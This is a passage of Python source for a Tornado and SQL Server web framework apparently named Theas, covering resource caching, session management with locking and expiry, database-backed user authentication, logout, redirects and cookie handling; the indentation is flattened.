resource_code == '~' or\
resource_code == '/' or\
resource_code == '':
th_session.log('Resource',
'No resource_code specified. Will load default resource for this session.')
get_default_resource = 1
else:
th_session.log('Resource', 'ThCachedResources.load_resource fetching from database',
resource_code if resource_code is not None else 'None')
# Get SysWebResourcesdata from database
this_proc = ThStoredProc('theas.spgetSysWebResources', th_session)
if this_proc.is_ok:
# Note: we could check for existence of @GetDefaultResource down below to help with backwards
# compatibility ... but that would mean having to call refresh_parameter_list, which is
# unnecessary overhead.
# this_proc.refresh_parameter_list()
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
this_proc.bind(str(int(all_static_blocks)), _mssql.SQLCHAR, '@AllStaticBlocks')
# if '@GetDefaultResource' in this_proc.parameter_list:
this_proc.bind(str(int(get_default_resource)), _mssql.SQLCHAR, '@GetDefaultResource')
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThCachedResources.load_resource received error result from call to theas.spgetSysWebResources in the SQL database.'
row_count = 0
this_static_blocks_dict = {}
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
row_count += 1
buf = row['ResourceText']
if not buf:
buf = row['ResourceData']
if buf:
buf = bytes(buf)
elif not all_static_blocks and buf and '$thInclude_' in buf:
# Perform replacement of includes. Template may include string like:
# $thInclude_MyResourceCode
# This will be replaced with the static block resource having a ResourceCode=MyResourceCode
tmp = string.Template(buf)
buf = tmp.safe_substitute(G_cached_resources.static_blocks_dict)
this_resource = ThResource()
this_resource.resource_code = row['ResourceCode']
this_resource.filename = row['Filename']
if 'Filetype' in row:
this_resource.filetype = row['Filetype']
if 'DateUpdated' in row:
this_resource.date_updated = row['DateUpdated']
this_resource.data = buf
this_resource.api_stored_proc = row['APIStoredProc']
this_resource.api_async_stored_proc = row['APIAsyncStoredProc']
this_resource.api_stored_proc_resultset_str = row['ResourceResultsets']
this_resource.is_public = row['IsPublic']
this_resource.is_static = row['IsStaticBlock']
this_resource.requires_authentication = row['RequiresAuthentication']
this_resource.render_jinja_template = row['RenderJinjaTemplate']
this_resource.skip_xsrf = row['SkipXSRF']
if 'OnBefore' in row:
this_resource.on_before = row['OnBefore']
if 'OnAfter' in row:
this_resource.on_after = row['OnAfter']
if 'Revision' in row:
this_resource.revision = row['Revision']
if this_resource.resource_code and \
this_resource.resource_code != '~': # added 2/11/2019: don't want to cache default resource
self.add_resource(row['ResourceCode'], this_resource)
if all_static_blocks:
this_static_blocks_dict['//thInclude_' + row['ResourceCode']] = buf
this_static_blocks_dict['thInclude_' + row['ResourceCode']] = buf
if resource_code and resource_code != '~' and row_count == 0:
# do negative cache
this_resource = ThResource()
this_resource.exists = False
self.add_resource(resource_code, this_resource)
if all_static_blocks:
ThCachedResources.static_blocks_dict = this_static_blocks_dict
have_next_resultset = this_proc.th_session.sql_conn.nextresult()
if have_next_resultset:
for row in this_proc.th_session.sql_conn:
# note: should only be one row
row_count += 1
buf = row['JSON_CurResourceRevisions']
ThCachedResources.resource_versions_dict = dict(
(v["ResourceCode"], v) for v in json.loads(buf))
this_proc = None
del this_proc
return this_resource
def delete_resource(self, resource_code=None, delete_all=False):
result = False
if delete_all and len(self.__resources) > 0:
self.lock()
try:
self.__resources.clear()
result = True
finally:
self.unlock()
self.load_global_resources()
elif resource_code is not None and resource_code in self.__resources:
self.lock()
try:
self.__resources[resource_code] = None
del self.__resources[resource_code]
result = True
finally:
self.unlock()
return result
def get_resource(self, resource_code, th_session, for_public_use=False, all_static_blocks=False,
none_if_not_found=True, get_default_resource=False, from_file=None):
global DEFAULT_RESOURCE_CODE
this_resource = None
if resource_code:
resource_code = resource_code.strip()
else:
if th_session is not None:
resource_code = th_session.bookmark_url
if resource_code == '':
resource_code = None
if resource_code is not None and resource_code in self.__resources:
# Cached resource
this_resource = self.__resources[resource_code]
if th_session is not None:
th_session.log('Resource', 'Serving from cache', resource_code)
else:
ThSession.cls_log('Resource', 'Serving from cache', resource_code)
else:
if th_session is not None:
# Load resource (which requires a session)
this_resource = self.load_resource(resource_code, th_session, all_static_blocks,
get_default_resource=get_default_resource)
log_msg = None
if th_session is not None and (this_resource is None or not this_resource.exists):
# if DEFAULT_RESOURCE_CODE:
# resource_code = DEFAULT_RESOURCE_CODE
# this_resource = self.load_resource(resource_code, th_session, all_static_blocks=False)
if resource_code or th_session is not None:
# suppress logging if there is no session and resource_code was not provided, because the caller
# was probably just checking for a cached resource
log_msg = 'Resource', 'Requested resource {} could not be loaded in ThCachedResources.get_resource'.format(
resource_code)
else:
if for_public_use and this_resource is None:
log_msg = 'Resource', 'Requested resource {} could not be loaded in ThCachedResources.get_resource'.format(
resource_code)
if log_msg is not None:
if th_session is not None:
th_session.log('Resource', log_msg)
else:
ThSession.cls_log('Resource', log_msg)
# Careful: we could be getting a cached resource in which case there may not yet be a session, in which
# case we can't update current_resource here! It is up to the caller to update current_resource
if th_session is not None and this_resource is not None and this_resource.exists and this_resource.resource_code != LOGIN_RESOURCE_CODE and this_resource.render_jinja_template:
# we are assuming that only a jinja template page will have a stored procedure / can serve
# as the current resource for a session. (We don't want javascript files and the like
# to be recorded as the current resource.)
th_session.current_resource = this_resource
th_session.theas_page.set_value('th:CurrentPage', this_resource.resource_code)
return this_resource
def load_global_resources(self):
self.load_resource('Theas.js', None, from_filename=self.default_path + 'Theas.js', is_public=True)
self.load_resource(None, None, all_static_blocks=True, sessionless=True)
# -------------------------------------------------
# Global session list
# -------------------------------------------------
class ThSessions:
"""Class ThSessions is to manage a thread-safe global dictionary of active user sessions.
It provides a mutex, and methods for locking and unlocking the global dictionary, as well as methods for
creating, retrieving, and deleting sessions.
It also provides support for a background thread that is responsible for automatically purging expired
sessions.
See class ThSession. (ThSessions manages a dictionary of ThSession objects.)
"""
_mutex = Lock()
def __init__(self):
self.__sessions = {}
self.waiting_for_busy = {}
self.background_thread_running = False
def __del__(self):
self.lock()
try:
for this_session_token in self.__sessions:
if self.__sessions[this_session_token]:
if self.__sessions[this_session_token].sql_conn:
self.__sessions[this_session_token].sql_conn = None
self.__sessions[this_session_token] = None
self.__sessions.clear()
finally:
self.unlock()
def lock(self):
self._mutex.acquire()
def unlock(self):
self._mutex.release()
def stop(self):
self.background_thread_running = False
def __len__(self):
return len(self.__sessions)
def add_session(self, session_token, this_session):
self.lock()
try:
self.__sessions[session_token] = this_session
finally:
self.unlock()
def remove_session(self, session_token):
this_session = None
self.lock()
try:
if session_token in self.__sessions:
this_session = self.__sessions[session_token]
del self.__sessions[session_token]
except Exception:
if LOGGING_LEVEL:
print('Exception in remove_session')
finally:
self.unlock()
return this_session
def remove_all_sessions(self):
self.lock()
try:
for session_token, this_sess in self.__sessions.items():
if this_sess is not None and this_sess.sql_conn is not None:
this_sess.sql_conn.close()
finally:
self.unlock()
def remove_expired(self, remove_all=False):
global G_program_options
self.lock()
try:
expireds = {}
for session_token in self.__sessions:
this_session = self.__sessions[session_token]
if (
remove_all or
this_session is None or
this_session.date_expire is None or
this_session.date_expire < datetime.datetime.now() or
(
G_program_options.sql_timeout > 0 and
this_session.date_sql_timeout is not None and
this_session.date_sql_timeout < datetime.datetime.now()
)
):
expireds[session_token] = this_session
for session_token in expireds:
this_session = expireds[session_token]
self.__sessions[session_token] = None
del self.__sessions[session_token]
if this_session is not None:
del this_session
del expireds
finally:
self.unlock()
@staticmethod
def log(category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
print(datetime.datetime.now(), 'ThSessions [{}]'.format(category), *args)
def retrieve_session(self, session_token=None, comments='', do_log=True):
this_sess = None
self.lock()
try:
if session_token and session_token in self.__sessions:
# have existing session
this_sess = self.__sessions[session_token]
if do_log:
this_sess.log('Sessions', 'Trying to retrieve existing session', session_token, comments)
finally:
self.unlock()
return this_sess
def _poll_remove_expired(self):
global G_server_is_running
last_poll = datetime.datetime.now()
while self.background_thread_running and G_server_is_running:
# self.log('PollRemoveExpired', 'Running background_thread_running')
if (datetime.datetime.now() - last_poll).total_seconds() > REMOVE_EXPIRED_THREAD_SLEEP:
last_poll = datetime.datetime.now()
self.log('PollRemoveExpired', 'Sessions at start', len(self.__sessions))
self.remove_expired()
self.log('PollRemoveExpired', 'Sessions at end', len(self.__sessions))
time.sleep(3) # sleep only for 3 seconds so the application can shutdown cleanly when needed
def start_cleanup_thread(self):
if REMOVE_EXPIRED_THREAD_SLEEP:
self.background_thread_running = True
expire_thread = threading.Thread(target=self._poll_remove_expired, name='ThSessions Cleanup')
expire_thread.start()
# -------------------------------------------------
# ThSession
# -------------------------------------------------
class ThSession:
"""Class ThSession manages all aspects of an individual user session.
Each session has a unique session_token, and is stored in a ThSessions object.
Each session also has its own dedicated SQL connection, manages authentication (including rendering the
login screen as needed), tracks elapsed time of individual requests, performs logging, provides locking
to prevent multiple simultaneous requests for the same session, and provides methods for initializing
a new session and for retrieving a session from the global ThSessions object.
ThSession.get_session() currently tries to retrieve a session from the global ThSessions object. In
he future it might make sense to move this retrieval to a method of ThSessions()
"""
def __init__(self, this_session_token, sessionless=False):
self.theas_page = None
self.sql_conn = None
self.log_current_request = True
self.current_handler = None
self.comments = None
self.session_token = None
if sessionless:
self.session_token = str(uuid.uuid4())
else:
self.session_token = this_session_token
self.logged_in = False
self.autologged_in = False
# not a "real" login, but rather indicates a login using LOGIN_AUTO_USER_TOKEN
self.__locked_by = None
self.__date_locked = None
self.__current_resource = None
self.current_template_str = None
self.current_data = None
self.bookmark_url = None
self.next_url = '/'
self.request_count = 0
self.initialized = False
self.date_start = datetime.datetime.now()
self.date_expire = None
self.date_last = None
self.date_last_sql_start = None
self.date_last_sql_done = None
self.date_sql_timeout = None
self.date_request_start = None
self.date_request_done = None
self.history = []
self.component_state = {}
self.log('Session', 'Created new session', self.session_token)
self.date_started = datetime.datetime.now()
self.sql_files_init_done = False
self.current_xsrf_form_html = None
# username holds the username of the currently authenticated user, and will be updated by authenticate()
self.username = None
self.user_token = None
# if set to true, upon successful authenticate the user's token will be saved to a cookie
# for automatic login on future visits
self.remember_user_token = REMEMBER_USER_TOKEN
self.theas_page = theas.Theas(theas_session=self)
@property
def current_resource(self):
return self.__current_resource
@property
def resource_versions(self):
# Return master resource_versions_dict from ThCachedResources to make this available in Theas filters
return ThCachedResources.resource_versions_dict
@current_resource.setter
def current_resource(self, value):
if value is not None and value.render_jinja_template:
if self.__current_resource is None or (value.resource_code != self.__current_resource.resource_code):
self.log('Resource', 'Current_resource changed to: {} Was: {}'.format(value.resource_code,
self.__current_resource.resource_code if self.__current_resource else 'not set'))
self.__current_resource = value
@property
def locked(self):
return False if self.__locked_by is None else True
def release_lock(self, handler=None):
if handler.handler_guid != self.__locked_by:
self.log('Session',
'WARNING: Session release_lock called, but caller does not have the lock. (Requestor={} locked_by={})'.format(
handler.handler_guid, self.__locked_by))
now = time.time()
elapsed = (now - self.__date_locked) * 1000 if self.__date_locked is not None else 0
self.log('Session', 'UNLOCK by handler ({})'.format(handler.handler_guid))
self.log('Timing', 'Session lock duration: {:.2f}ms'.format(elapsed))
self.__locked_by = None
self.__date_locked = None
def get_lock(self, handler=None, handler_guid=None, no_log=False):
result = False
this_handler_guid = None
if handler is not None:
this_handler_guid = handler.handler_guid
if this_handler_guid is None:
this_handler_guid = handler_guid
assert this_handler_guid is not None, 'ThSession.get_lock requires a value for handler_guid (or handler.handler_guid)'
if self.__locked_by == this_handler_guid:
# Requestor already has a lock. Nothing to do.
result = True
else:
this_give_up = False
# while self.__locked_by is not None and self.__locked_by != handler.handler_guid and not this_give_up:
# note: can't really wait for a lock here. Return quickly, and let the caller retry.
if self.__locked_by is not None and self.__locked_by != this_handler_guid and not this_give_up:
this_give_up = True
self.log('Session', 'Waiting for busy session. Wanted by {}'.format(this_handler_guid))
# if self.__date_locked is not None and time.time() - self.__date_locked > 30000:
# self.log('Session', 'Giving up waiting for busy session: killing stuck session wanted by {}'.format(handler.handler_guid))
# if self.sql_conn is not None and\
# self.date_sql_timeout is not None and\
# datetime.datetime.now() > self.date_sql_timeout:
# Still waiting for a response from sql in a different thread. Yuck.
# self.log('Session', 'SQL connection is stuck waiting for a response in a different thread!!!')
#
# # We can't forcibly access this session--not thread-safe to do so. Must abandon.
# this_give_up = True
# self.__date_busy_start = None
# self.sql_conn.cancel() # is likely to crash us / is not thread-safe
# self.sql_conn = None # discard this SQL connection
# self.logged_in = False # without a SQL connection we will need to re-authenticate
# this_sess.logout()
# G_sessions.remove_session(self.session_token)
# this_sess = None
# Note: We expect this code to be run in a separate thread. If it is run in the main thread, it will
# never be able to access the busy session (because the main thread will just be running this loop and
# will never be allowed to release the other lock on the session.
if not this_give_up:
result = True
self.__locked_by = handler_guid
self.__date_locked = time.time()
self.request_count += 1
if not no_log:
self.log('Session', 'LOCK obtained by handler ({})'.format(self.__locked_by))
return result
def __del__(self):
if self.theas_page is not None:
self.theas_page = None
del self.theas_page
if self.sql_conn is not None:
if self.sql_conn.connected:
self.sql_conn.close()
self.sql_conn = None
del self.sql_conn
@classmethod
def cls_log(cls, category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
print(datetime.datetime.now(), 'ThSessions [' + category + ']:', *args)
@classmethod
def get_session(cls, retrieve_from_db=False, inhibit_create=False,
comments=None, defer_sql=False, do_log=True, session_token=None, handler_guid=None):
global G_sessions
# Retrieve or create a session as needed.
# See if requestor provided a session token (in cookie, URI, or form field). If so, look up in global
# list of sessions. If no session token or session is not in list, create a new session.
date_start = datetime.datetime.now()
this_sess = None
lock_succeeded = False # indicates we received a lock
failed_to_lock = False # indicates we attempted a lock, but failed
if session_token:
# try to retrieve the session from the global list
this_sess = G_sessions.retrieve_session(session_token, comments=comments, do_log=do_log)
if this_sess is not None:
this_sess.log('Session', 'Obtained existing session', this_sess.session_token)
lock_succeeded = this_sess.get_lock(handler_guid=handler_guid)
if not lock_succeeded:
this_sess = None
failed_to_lock = True
if this_sess is not None:
this_sess.log_current_request = do_log
this_sess.comments = comments
elif not failed_to_lock:
if inhibit_create:
# not allowed to start new session
cls.cls_log('Sessions', 'Need to create new session, but inhibit_crecate prevents new session')
else:
# start new session
session_token = str(uuid.uuid4())
this_sess = ThSession(session_token)
#if USE_SECURE_COOKIES:
# secval = tornado.web.create_signed_value(COOKIE_SECRET, SESSION_COOKIE_NAME, session_token)
# this_sess.theas_page.set_value(SESSION_COOKIE_NAME, secval)
#else:
# this_sess.theas_page.set_value(SESSION_COOKIE_NAME, session_token)
this_sess.log_current_request = do_log
G_sessions.add_session(session_token, this_sess)
this_sess.log('Sessions', 'Active session count', len(G_sessions))
# get lock on the new session
lock_succeeded = this_sess.get_lock(handler_guid=handler_guid)
if not lock_succeeded:
this_sess = None
failed_to_lock = True
# we should now always have a session unless inhibit_create==True
# assert this_sess is not None and this_sess.get_lock(handler=handler, no_log=True), 'Could not obtain session in ThSession.get_session'
if this_sess is not None:
this_sess.date_request_start = date_start
this_sess.date_expire = datetime.datetime.now() + datetime.timedelta(minutes=SESSION_MAX_IDLE)
return this_sess, failed_to_lock
def log(self, category, *args, severity=10000):
if LOGGING_LEVEL == 1 or 0 > severity >= LOGGING_LEVEL:
if self.log_current_request:
# print(datetime.datetime.now(), 'ThSession [{}:{}] ({}) - {} ({})'.format(
print(datetime.datetime.now(), 'ThSession [{}:{}] - {} ({})'.format(
self.session_token,
self.request_count,
# self.__locked_by,
category,
self.comments if self.comments is not None else '',
), *args)
def init_session(self, defer_sql=False, force_init=False):
global G_program_options
global G_sessions
if force_init:
self.sql_conn = None
if force_init or self.sql_conn is None or (self.sql_conn is not None and not self.sql_conn.connected):
defer_sql = False
self.initialized = False
if not defer_sql and (self.sql_conn is None or not self.initialized):
# Establish SQL connection, initialize
if not defer_sql:
if self.sql_conn is None:
self.log('SQL', 'Creating new SQL connection')
try:
self.sql_conn = _mssql.connect(
server=G_program_options.sql_server,
port=G_program_options.sql_port,
user=G_program_options.sql_user,
password=G_program_options.sql_password,
database=G_program_options.sql_database,
appname=G_program_options.sql_appname
)
self.log('SQL', 'FreeTDS version: ' + str(self.sql_conn.tds_version))
except Exception as e:
self.log('SQL', 'Error creating new SQL connection: ' + str(e))
if self.sql_conn is not None:
self.sql_conn.query_timeout = G_program_options.sql_timeout
# Note: we have created a new user session, but the user still needs to be authenticated
self.initialized = True
# make sure session has been initialized to handle uploaded files
if not self.sql_files_init_done:
# Initialize theas session: stored proc returns SQL statements we need to execute
proc = ThStoredProc('theas.spgetInitSession', self) # SOS Agri: must be spInitSession2
if proc.is_ok:
result_value = proc.execute()
for row in proc.resultset:
self.sql_conn.execute_non_query(row['SQLToExecute'])
self.sql_files_init_done = True
if LOGIN_AUTO_USER_TOKEN and not self.logged_in and not self.autologged_in and self.current_handler is not None:
self.log('Auth', 'Authenticating as AUTO user (i.e. public)')
try:
self.authenticate(user_token=LOGIN_AUTO_USER_TOKEN)
except:
self.autologged_in = False
if not self.autologged_in:
self.log('Auth',
'Error: Authentication as AUTO user (i.e. public) FAILED. Is your config file wrong?')
self.log('Auth', 'Bad AUTO user token: {}'.format(LOGIN_AUTO_USER_TOKEN))
return self
def finished(self):
if not self.__locked_by:
pass
else:
self.date_request_done = datetime.datetime.now()
self.current_data = None # clear out data that was used by this request's template
if len(self.history) > 0 and self.history[-1]['PageName'] == self.theas_page.get_value('theas:th:NextPage'):
# self.history[-1]['stepGUID'] = self.get_param('stepGUID')
# self.history[-1]['stepDefID'] = self.get_param('stepDefID')
pass
else:
this_history_entry = {}
this_history_entry['DateRequestDone'] = self.date_request_done
this_history_entry['PageName'] = self.theas_page.get_value('theas:th:NextPage')
# this_history_entry['stepGUID'] = self.get_param('stepGUID')
# this_history_entry['stepDefID'] = self.get_param('stepDefID')
self.history.append(this_history_entry)
self.log('Session', 'Total requests for this session: ', self.request_count)
self.log('Session', 'Finished with this request')
if self.sql_conn is None:
self.log('Session', 'Destroying session')
G_sessions.remove_session(self.session_token)
else:
self.log('Session', 'Will time out at', self.date_expire)
self.log_current_request = True
self.current_handler.cookies_changed = False
self.release_lock(handler=self.current_handler)
def authenticate(self, username=None, password=None, user_token=None, retrieve_existing=False):
"""
:param username: Username of user. If provided, provide password as well
:param password: Password of user. Provide if username is provided
:param user_token: Token for user authentication. May be provided INSTEAD of username and password
:param retrieve_existing: Boolean flag. If set, does not authenticate, but does retrieve existing session
:return: logged_in (boolean), error_message (string)
"""
error_message = ''
self.logged_in = False
result = False
if self.current_handler is not None:
if username is None and password is None and user_token is None and not retrieve_existing:
# caller didn't specify username/password or user-token, so check for a form
# post from the login page
if 'u' in self.current_handler.request.arguments:
username = self.current_handler.get_argument('u')[0]
elif 'theas:Login:UserName' in self.current_handler.request.arguments:
username = self.current_handler.get_argument('theas:Login:UserName')
if 'pw' in self.current_handler.request.arguments:
password = self.current_handler.request.get_argument('pw')
elif 'theas:Login:Password' in self.current_handler.request.arguments:
password = self.current_handler.get_argument('theas:Login:Password')
# theas:th:RememberUser is a checkbox (which will not be submitted if unchecked)--so default to '0'
temp_remember = '0'
# see if form tells us whether to remember the user
temp_remember_arg = self.current_handler.get_arguments('theas:th:RememberUser')
if len(temp_remember_arg):
temp_remember = temp_remember_arg[0]
self.theas_page.set_value('theas:th:RememberUser', temp_remember)
if self.theas_page:
temp_remember = self.theas_page.get_value('theas:th:RememberUser', auto_create=False)
if temp_remember is not None:
self.remember_user_token = temp_remember == '1'
self.log('Session', 'Attempting authentication')
# The session keeps a copy of the user_name for convenience / to access in templates
self.username = None
# authenticate user into database app
proc = ThStoredProc('theas.spdoAuthenticateUser', self)
if proc.is_ok:
if retrieve_existing:
proc.bind(retrieve_existing, _mssql.SQLVARCHAR, '@RetrieveExisting')
else:
if username is not None:
proc.bind(username, _mssql.SQLVARCHAR, '@UserName')
if password is not None:
proc.bind(password, _mssql.SQLVARCHAR, '@Password')
if user_token is not None:
proc.bind(user_token, _mssql.SQLVARCHAR, '@UserToken')
if self.session_token is not None:
# @SessionToken is informational only: allows the web session to be logged in the database
proc.bind(self.session_token, _mssql.SQLVARCHAR, '@SessionToken')
try:
session_guid = None
result_value = proc.execute()
for row in proc.resultset:
session_guid = row['SessionGUID']
user_token = row['UserToken']
username = row['UserName']
if session_guid is not None:
if user_token == LOGIN_AUTO_USER_TOKEN:
self.logged_in = False
self.autologged_in = True
self.log('Auth', 'Authenticated as AUTO (public)... not a real login')
else:
self.logged_in = True
# Store some user information (so the information can be accessed in templates)
self.username = username
self.user_token = user_token
if self.current_data:
# update data for template (in case Authenticate() was called at the request
# of a resource's stored procedure just before rendering the page)
self.current_data['_Theas']['UserName'] = self.username
self.current_data['_Theas']['LoggedIn'] = self.logged_in
self.current_data['_Theas']['UserToken'] = self.user_token
self.log('Auth', 'Authenticated as actual user {}'.format(self.username))
proc = None
del proc
except Exception as e:
self.logged_in = False
self.user_token = None
self.log('Session', 'Authentication failed:', e)
error_message = repr(e) + '|' + 'Invalid username or password.|1|Could Not Log In'
else:
self.logged_in = False
self.log('Session', 'Could not access SQL database server to attempt Authentication.')
error_message = 'Could not access SQL database server|Sorry, the server is not available right now|1|Cannot Log In'
if self.current_handler:
# If authentication was successful, we want to make sure the UserToken
# cookie is set properly. (If authentication was not successful,
# we make no changes to the UserToken cookie.)
self.current_handler.cookie_usertoken = None
if self.logged_in and self.remember_user_token:
self.current_handler.cookie_usertoken = self.user_token
# always write the cookie...even if authentication failed (in which case we need to clear it)
self.current_handler.write_cookies()
return self.logged_in, error_message
def logout(self):
self.log('Session', 'Logged out.')
self.release_lock(handler=self.current_handler)
self.logged_in = False
if self.sql_conn is not None and self.sql_conn.connected:
self.log('SQL', 'Closing SQL connection in ThSession.logout')
try:
self.sql_conn.cancel()
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling sql_conn.cancel(). {}'.format(e))
finally:
self.log('SQL', 'Call to cancel() on SQL connection complete')
try:
proc = ThStoredProc('theas.spdoLogout', self)
if proc.is_ok:
proc.bind(self.session_token, _mssql.SQLVARCHAR, '@SessionToken')
proc.execute()
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling theas.spdoLogout. {}'.format(e))
try:
self.sql_conn.close()
self.sql_conn = None
except Exception as e:
self.log('SQL', 'In ThSession.logout, exception calling sql_conn.close(). {}'.format(e))
finally:
self.log('SQL', 'In ThSession.logout, call to close() on SQL connection complete')
def clientside_redir(self, url=None, action='get'):
# returns tiny html document to send to browser to cause the browser to post back to us
if not url:
if self.bookmark_url:
url = self.bookmark_url
self.bookmark_url = None
elif self.current_resource and self.current_resource.resource_code:
url = self.current_resource.resource_code
else:
url = '/'
if action == 'get':
buf = '''<!doctype html>
<html>
<head>
<script>window.location = "{action}";</script>
</head>
<body>
</body>
</html>'''
buf = buf.format(action=url)
else:
buf = '''<!doctype html>
<html>
<body>
<form id="frmBounce" method="POST" action="{action}" onSubmit="noDef();">
<input type="hidden" name={session_cookie_name} value="{session_token}"/>
{xsrf}
</form>
<script>
function noDef(e) {{
if (!e) {{
e = window.event;
}}
if (e.preventDefault) {{
e.preventDefault();
}}
if (e.stopPropagation) {{
// IE9 & Other Browsers
e.stopPropagation();
}}
else {{
// IE8 and Lower
e.cancelBubble = true;
}}
}}
document.getElementById("frmBounce").submit();
</script>
</body>
</html>'''
buf = buf.format(action=url, session_token=self.session_token,
xsrf=self.current_handler.xsrf_form_html(),
session_cookie_name=SESSION_COOKIE_NAME)
return buf
def do_on_sql_start(self, proc):
self.date_last_sql_start = time.time()
self.date_sql_timeout = datetime.datetime.now() + datetime.timedelta(seconds=G_program_options.sql_timeout)
self.log('Timing', 'SQL Start for procedure: ', proc.stored_proc_name)
self.log('Timing', 'SQL execution times out at:', self.date_sql_timeout)
def do_on_sql_done(self, proc):
now = time.time()
self.date_last_sql_done = now
self.date_sql_timeout = None
elapsed = (now - self.date_last_sql_start) * 1000 if self.date_last_sql_start is not None else 0
self.log('Timing', 'SQL Done. Duration: {:.2f}ms'.format(elapsed))
def init_template_data(self):
this_data = {}
this_data['_Theas'] = {}
#this_data['_Theas']['ST'] = self.session_token
this_data['_Theas']['UserName'] = self.username
this_data['_Theas']['LoggedIn'] = self.logged_in
#this_data['_Theas']['UserToken'] = self.user_token
if self.current_handler is not None:
this_data['_Theas']['xsrf_token'] = self.current_handler.xsrf_token.decode('ascii')
this_data['_Theas']['__handler_guid'] = self.current_handler.handler_guid
this_data['_Theas']['theasServerPrefix'] = G_program_options.server_prefix
# this_data['_Theas']['xsrf_formHTML'] = self.current_handler.xsrf_form_html()
this_data['_Theas']['theasParams'] = self.theas_page.get_controls()
if self.current_resource is not None:
this_data['_Theas']['theasCurrentPage'] = self.current_resource.resource_code
this_data['_Theas']['theasIncludes'] = G_cached_resources.static_blocks_dict
this_data['_Theas']['theasJS'] = 'Theas.js'
now_time = datetime.datetime.now().strftime("%I:%M%p")
this_data['_Theas']['Now'] = now_time
# Note: if an APIStoredProc is called, data._resultsetMeta will be added,
# but we do not add this dictionary here during initialization
# this_data['_resultsetMeta'] = {}
self.current_data = this_data
return this_data
def build_login_screen(self):
global G_cached_resources
self.log('Response', 'Building login screen')
buf = '<html><body>No data in build_login_screen</body></html>'
resource = None
template_str = ''
self.log('Resource', 'Fetching login page resource')
resource = G_cached_resources.get_resource(LOGIN_RESOURCE_CODE, self)
if resource is None:
# raise Exception ('Could not load login screen template from the database. Empty template returned from call to theas.spgetSysWebResources.')
buf = '<html><head><meta http-equiv="refresh" content="30"></meta><body>Could not load login screen template from the database server. Empty template returned from call to theas.spgetSysWebResources.<br /><br />Will try again shortly... </body></html>'
else:
template_str = resource.data
this_data = self.init_template_data()
buf = self.theas_page.render(template_str, data=this_data)
return buf
# -------------------------------------------------
# ThResponseInfo
# -------------------------------------------------
class ThResponseInfo:
def __init__(self):
self.current_date = None
self.date_updated = None
self.expires = None
self.content_length = None
self.cache_control = None
self.content_type = None
self.content_filename = None
self.etag = None
# -------------------------------------------------
# ThHandler main request handler
# -------------------------------------------------
class ThHandler(tornado.web.RequestHandler):
executor = ThreadPoolExecutor(max_workers=MAX_WORKERS)
def __init__(self, application, request, **kwargs):
super().__init__(application, request, **kwargs)
self.session = None
self.handler_guid = str(uuid.uuid4())
self.deferred_xsrf = False
self.set_header('Server', 'Theas/{}'.format(THEAS_VERSION))
self.filename = None
self.__cookies_changed = False
self.__cookie_st = None
self.__cookie_usertoken = None
# Retrieve session and user token cookie values and save
# them in the new session in __cookie_st and __cookie_usertoken
self.retrieve_cookies()
def __del__(self):
self.session = None
@property
def cookie_st(self):
return self.__cookie_st
@cookie_st.setter
def cookie_st(self, new_val):
if new_val == '':
new_val = None
if new_val is not None and self.__cookie_st != new_val:
self.__cookie_st = new_val
self.cookies_changed = True
@property
def cookie_usertoken(self):
return self.__cookie_usertoken
@cookie_usertoken.setter
def cookie_usertoken(self, new_val):
if self.__cookie_usertoken != (None if new_val == '' else new_val):
self.__cookie_usertoken = new_val
self.cookies_changed = True
@property
def cookies_changed(self):
return self.__cookies_changed
@cookies_changed.setter
def cookies_changed(self, new_val):
if self.__cookies_changed != new_val:
ThSession.cls_log('Cookies', 'Flag cookies_changed set to {}'.format(new_val))
self.__cookies_changed = new_val
def get_response_info(self, resource_code, th_session, sessionless=False):
'''
Determine response length and content type. Used for HEAD requests.
:param resource_code:
:param th_session:
:param all_static_blocks:
:param sessionless:
:param from_filename:
:param is_public:
:param is_static:
:param get_default_resource:
:return:
'''
# load resource from database
if th_session is None:
if not sessionless:
assert th_session is not None, 'ThHandler: get_response_info called without a valid session'
else:
th_session = ThSession(None, sessionless=True)
# Get stored proc thes.spGetResponseInfo
this_proc = ThStoredProc('theas.spgetResponseInfo', th_session)
if this_proc.is_ok:
this_proc.bind(resource_code, _mssql.SQLCHAR, '@ResourceCode', null=(resource_code is None))
proc_result = this_proc.execute(fetch_rows=False)
assert proc_result, 'ThHandler: get_response_info received error result from call to theas.spgetResponseInfo in the SQL database.'
response_info = ThResponseInfo()
row_count = 0
self.set_header('Server', 'theas')
th_session = None
if this_proc.th_session.sql_conn is not None:
for row in this_proc.th_session.sql_conn:
# note: should only be one row
row_count += 1
response_info.current_date = row['CurrentDate']
response_info.date_updated = row['DateUpdated']
response_info.content_length = row['ContentLength']
response_info.cache_control = row['CacheControl']
response_info.content_type = row['ContentType']
response_info.content_filename = row['ContentFilename']
response_info.content_expires = row['ContentExpires']
response_info.etag = row['Etag']
this_proc = None
del this_proc
return response_info
def retrieve_cookies(self):
self.__cookie_st = None
self.__cookie_usertoken = None
orig_cookie = self.get_secure_cookie(SESSION_COOKIE_NAME)
if orig_cookie is not None and orig_cookie != b'':
self.__cookie_st = orig_cookie.decode(encoding='ascii')
else:
self.__cookie_st = self.get_cookie(SESSION_COOKIE_NAME)
orig_cookie = self.get_secure_cookie(USER_COOKIE_NAME)
if orig_cookie is not None and orig_cookie != b'':
self.__cookie_usertoken = orig_cookie.decode(encoding='ascii')
else:
self.__cookie_usertoken = self.get_cookie(USER_COOKIE_NAME)
#else:
# self.current_handler.cookie_st = None
# self.current_handler.write_cookies()
# self.log('Cookies',
# 'Cleared cookie {} because USE_SESSION_COOKIE is not true'.format(SESSION_COOKIE_NAME))
def write_cookies(self):
if self.cookie_st is None or len(self.cookie_st) == 0:
self.clear_cookie(SESSION_COOKIE_NAME, path='/')
else:
if USE_SECURE_COOKIES:
self.set_secure_cookie(SESSION_COOKIE_NAME, self.cookie_st, path='/')
else:
self.set_cookie(SESSION_COOKIE_NAME, self.cookie_st, path='/')
if self.cookie_usertoken is None or len(self.cookie_usertoken) == 0:
self.clear_cookie(USER_COOKIE_NAME, path='/')
else:
if USE_SECURE_COOKIES:
self.set_secure_cookie(USER_COOKIE_NAME, self.cookie_usertoken, path='/')
else:
